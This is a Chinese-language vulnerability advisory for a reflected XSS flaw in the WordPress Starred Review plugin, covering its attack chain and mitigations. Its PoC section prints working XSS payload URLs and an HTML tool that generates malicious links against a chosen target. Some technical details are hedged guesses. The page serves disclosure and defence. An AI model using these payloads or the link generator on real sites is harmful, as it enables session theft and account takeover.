CVE-2025-14118 WordPress Starred Review插件反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14118

漏洞类型

反射型XSS (Cross-Site Scripting)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Starred Review插件

漏洞概述

CVE-2025-14118是WordPress平台Starred Review插件中的一个中危安全漏洞。该漏洞为反射型跨站脚本攻击（Reflected XSS），存在于插件的所有版本直至1.4.2。漏洞的根本原因在于插件对用户输入处理不当，特别是PHP_SELF变量的使用缺乏足够的输入清理和输出转义。PHP_SELF是PHP预定义变量，返回当前执行脚本的路径信息，攻击者可以通过在URL中注入恶意脚本来利用此变量。由于该漏洞不需要认证即可利用，未经身份验证的攻击者可以构造恶意链接并诱导用户点击，从而在受害者的浏览器中执行任意JavaScript代码。这可能导致会话劫持、敏感信息窃取、恶意内容注入等安全问题。建议受影响的用户立即将插件升级至最新版本以修复此漏洞。

技术细节

该漏洞源于Starred Review插件在处理HTTP请求时直接使用PHP_SELF变量而未进行适当的输入验证和输出编码。在starred-review.php第29行附近，插件可能将PHP_SELF的值用于生成表单action或其他URL相关功能。攻击者可以通过构造包含恶意JavaScript代码的URL来触发此漏洞，例如：/wp-admin/admin.php?page=starred-review/<script>alert(document.cookie)</script>。当受害者访问该恶意链接时，浏览器会执行注入的脚本代码。由于该漏洞是反射型XSS，恶意脚本不会存储在服务器上，而是通过URL参数传递并在响应中反射回用户浏览器。攻击成功需要用户主动点击攻击者提供的恶意链接，这通常通过社交工程手段实现。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户或进行钓鱼攻击。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站是否安装并启用Starred Review插件（版本<=1.4.2）

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的URL，利用PHP_SELF变量注入XSS payload

STEP 3

步骤3

攻击者通过钓鱼邮件、社交媒体或其他渠道诱导目标用户点击恶意链接

STEP 4

步骤4

目标用户点击链接后，浏览器向服务器发送请求，恶意payload被反射回用户浏览器

STEP 5

步骤5

浏览器执行注入的JavaScript代码，攻击者成功窃取用户cookie、会话令牌或执行其他恶意操作

STEP 6

步骤6

攻击者利用窃取的凭证劫持用户账户，进一步渗透网站或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-14118 PoC - Reflected XSS in Starred Review Plugin -->
<!-- Target: WordPress Starred Review Plugin <= 1.4.2 -->
<!-- Attack Vector: Malicious URL via PHP_SELF -->

<!-- 
Usage: 
1. Attacker crafts a malicious URL containing XSS payload
2. Victim must be logged into WordPress
3. Victim clicks the malicious link
4. JavaScript code executes in victim's browser
-->

<!-- Example malicious URL -->
<!-- 
http://target-site.com/wp-admin/admin.php?page=starred-review/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
-->

<!-- HTML form to demonstrate the attack -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-14118 PoC</title>
</head>
<body>
    <h2>Malicious Link Generator for CVE-2025-14118</h2>
    <form id="pocForm">
        <label>Target URL:</label><br>
        <input type="text" id="targetUrl" size="50" placeholder="http://wordpress-site.com/wp-admin/"><br><br>
        <label>XSS Payload:</label><br>
        <input type="text" id="payload" size="50" value='"><script>alert("XSS")</script><x y="'><br><br>
        <button type="button" onclick="generateLink()">Generate Malicious Link</button>
    </form>
    <p id="result"></p>
    
    <script>
        function generateLink() {
            var baseUrl = document.getElementById('targetUrl').value;
            var payload = encodeURIComponent(document.getElementById('payload').value);
            var maliciousUrl = baseUrl + 'admin.php?page=starred-review/' + payload;
            document.getElementById('result').innerHTML = 
                'Malicious URL: <a href="' + maliciousUrl + '" target="_blank">' + maliciousUrl + '</a>';
        }
    </script>
</body>
</html>

影响范围

Starred Review WordPress Plugin <= 1.4.2

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 临时禁用Starred Review插件直至修复版本发布；2) 部署Web应用防火墙(WAF)规则过滤恶意请求参数；3) 对管理员进行安全培训，提醒不要点击可疑链接；4) 启用HTTP Security Headers（如X-XSS-Protection、X-Content-Type-Options）；5) 监控服务器日志以检测潜在的XSS利用尝试。由于该漏洞利用难度较低且影响范围明确，建议优先关注官方更新并及时修补。